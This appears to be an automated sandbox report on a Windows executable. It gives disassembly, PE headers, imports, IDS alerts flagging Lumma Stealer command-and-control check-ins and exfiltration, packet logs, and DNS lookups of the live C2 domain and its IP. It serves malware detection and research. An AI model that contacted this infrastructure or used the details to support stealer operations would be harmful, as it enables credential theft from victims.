                                      push 00476AA0h
                                      call 00007F0280C5E07Dh
                                      call dword ptr [004090B0h]
                                      push eax
                                      mov edi, 004CF0A0h
                                      push edi
                                      call 00007F0280C5E06Bh
                                      push ebp
                                      call dword ptr [00409134h]
                                      cmp word ptr [004CF0A0h], 0022h
                                      mov dword ptr [0047EAB8h], eax
                                      mov eax, edi
                                      jne 00007F0280C5B96Ah
                                      push 00000022h
                                      pop esi
                                      mov eax, 004CF0A2h
                                      push esi
                                      push eax
                                      call 00007F0280C5DD41h
                                      push eax
                                      call dword ptr [00409260h]
                                      mov esi, eax
                                      mov dword ptr [esp+1Ch], esi
                                      jmp 00007F0280C5B9F3h
                                      push 00000020h
                                      pop ebx
                                      cmp ax, bx
                                      jne 00007F0280C5B96Ah
                                      add esi, 02h
                                      cmp word ptr [esi], bx

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ C ] VS2010 SP1 build 40219
                                      • [RES] VS2010 SP1 build 40219
                                      • [LNK] VS2010 SP1 build 40219

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xca6e.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x10cc3c0x2f30
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x1000000xca6e0xcc00569ff95b5331009a26662c9b5ac1038aFalse0.8082490808823529data7.091824152592848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x10d0000xfd60x1000cef0a100e30ec9765bca61f09a3e76d1False0.569580078125data5.3244841607782325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x1002980x6502PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006187640188724
                                      RT_ICON0x10679c0x1e44PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014197212183789
                                      RT_ICON0x1085e00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.45779088689991865
                                      RT_ICON0x10ac480x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.4972677595628415
                                      RT_ICON0x10bd700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5815602836879432
                                      RT_DIALOG0x10c1d80x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x10c2d80x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x10c3f40x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x10c4540x4cdataEnglishUnited States0.8026315789473685
                                      RT_VERSION0x10c4a00x2f8dataEnglishUnited States0.45
                                      RT_MANIFEST0x10c7980x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                      Imports

                                      DLLImport
                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-28T09:13:23.312130+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549727104.21.80.1443TCP
                                      2024-12-28T09:13:24.069083+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549727104.21.80.1443TCP
                                      2024-12-28T09:13:24.069083+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549727104.21.80.1443TCP
                                      2024-12-28T09:13:25.381207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549733104.21.80.1443TCP
                                      2024-12-28T09:13:26.175399+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549733104.21.80.1443TCP
                                      2024-12-28T09:13:26.175399+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549733104.21.80.1443TCP
                                      2024-12-28T09:13:27.757910+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549738104.21.80.1443TCP
                                      2024-12-28T09:13:29.923164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549744104.21.80.1443TCP
                                      2024-12-28T09:13:32.201365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549750104.21.80.1443TCP
                                      2024-12-28T09:13:34.733711+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549756104.21.80.1443TCP
                                      2024-12-28T09:13:36.787090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549762104.21.80.1443TCP
                                      2024-12-28T09:13:37.598789+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549762104.21.80.1443TCP
                                      2024-12-28T09:13:39.138807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549768104.21.80.1443TCP
                                      2024-12-28T09:13:39.142379+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549768104.21.80.1443TCP
                                      2024-12-28T09:13:41.715508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549779104.21.80.1443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 28, 2024 09:13:22.049202919 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:22.049249887 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:22.049314022 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:22.050545931 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:22.050559044 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:23.311991930 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:23.312129974 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:23.315656900 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:23.315665007 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:23.315874100 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:23.355601072 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:23.361685038 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:23.361685038 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:23.361753941 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.069089890 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.069183111 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.069515944 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.070949078 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.070974112 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.070985079 CET49727443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.070991993 CET44349727104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.076992989 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.077027082 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:24.077096939 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.077359915 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:24.077374935 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:25.381004095 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:25.381206989 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:25.382304907 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:25.382316113 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:25.382546902 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:25.383697033 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:25.383725882 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:25.383769035 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175409079 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175476074 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175523996 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175558090 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175760984 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.175777912 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.175802946 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.176465988 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.176517963 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.176527023 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.194794893 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.194825888 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.194919109 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.194927931 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.195101023 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.295003891 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.340012074 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.340023994 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.386846066 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.386852980 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.389352083 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.389543056 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.389554024 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.397382975 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.397469997 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.397470951 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.397525072 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.397713900 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.397731066 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.397759914 CET49733443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.397767067 CET44349733104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.453488111 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.453531027 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:26.453645945 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.453928947 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:26.453946114 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:27.757800102 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:27.757910013 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:27.759018898 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:27.759026051 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:27.759252071 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:27.760304928 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:27.760431051 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:27.760462999 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:28.693898916 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:28.694001913 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:28.694108009 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:28.694276094 CET49738443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:28.694295883 CET44349738104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:28.711224079 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:28.711277962 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:28.711355925 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:28.711620092 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:28.711632967 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:29.923058033 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:29.923163891 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:29.924220085 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:29.924230099 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:29.924455881 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:29.925574064 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:29.925698996 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:29.925729990 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:29.925784111 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:29.967344046 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:30.854028940 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:30.854178905 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:30.854254961 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:30.854327917 CET49744443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:30.854346037 CET44349744104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:30.942693949 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:30.942739964 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:30.942805052 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:30.943077087 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:30.943093061 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:32.201239109 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:32.201364994 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:32.202878952 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:32.202892065 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:32.203217030 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:32.213318110 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:32.213510036 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:32.213553905 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:32.213620901 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:32.213629961 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:33.165182114 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:33.165313005 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:33.165457010 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:33.165798903 CET49750443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:33.165812969 CET44349750104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:33.474611998 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:33.474647999 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:33.474730015 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:33.475090981 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:33.475107908 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:34.733628988 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:34.733711004 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:34.734874964 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:34.734885931 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:34.735209942 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:34.736654997 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:34.736767054 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:34.736799955 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:35.510503054 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:35.510597944 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:35.510660887 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:35.510823011 CET49756443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:35.510838032 CET44349756104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:35.529443026 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:35.529488087 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:35.529570103 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:35.529932976 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:35.529946089 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:36.786998987 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:36.787090063 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:36.788096905 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:36.788101912 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:36.788291931 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:36.789310932 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:36.789397001 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:36.789402008 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:37.598790884 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:37.598889112 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:37.598938942 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:37.599080086 CET49762443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:37.599096060 CET44349762104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:37.882941961 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:37.882972956 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:37.883140087 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:37.883373976 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:37.883384943 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.138679028 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.138807058 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.140012026 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.140017986 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.140238047 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.141329050 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.141980886 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142011881 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142093897 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142122030 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142211914 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142261028 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142357111 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142385960 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142487049 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142512083 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142621994 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142647028 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.142658949 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142760992 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.142790079 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.187330008 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.187473059 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.187511921 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.187524080 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.231333971 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.231472969 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.231513977 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.231539965 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.275330067 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.275413036 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:39.319371939 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:39.382823944 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.609818935 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.609914064 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.609967947 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:41.610251904 CET49768443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:41.610269070 CET44349768104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.612906933 CET49779443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:41.612942934 CET44349779104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.613019943 CET49779443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:41.613302946 CET49779443192.168.2.5104.21.80.1
                                      Dec 28, 2024 09:13:41.613312960 CET44349779104.21.80.1192.168.2.5
                                      Dec 28, 2024 09:13:41.715507984 CET49779443192.168.2.5104.21.80.1

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 28, 2024 09:12:58.816972971 CET5185553192.168.2.51.1.1.1
                                      Dec 28, 2024 09:12:59.041115046 CET53518551.1.1.1192.168.2.5
                                      Dec 28, 2024 09:13:21.723227024 CET5462353192.168.2.51.1.1.1
                                      Dec 28, 2024 09:13:22.042922020 CET53546231.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 28, 2024 09:12:58.816972971 CET192.168.2.51.1.1.10x36d6Standard query (0)yHUkiJhYyguIo.yHUkiJhYyguIoA (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:21.723227024 CET192.168.2.51.1.1.10xfd3cStandard query (0)crackerdolk.clickA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 28, 2024 09:12:59.041115046 CET1.1.1.1192.168.2.50x36d6Name error (3)yHUkiJhYyguIo.yHUkiJhYyguIononenoneA (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.80.1A (IP address)IN (0x0001)false
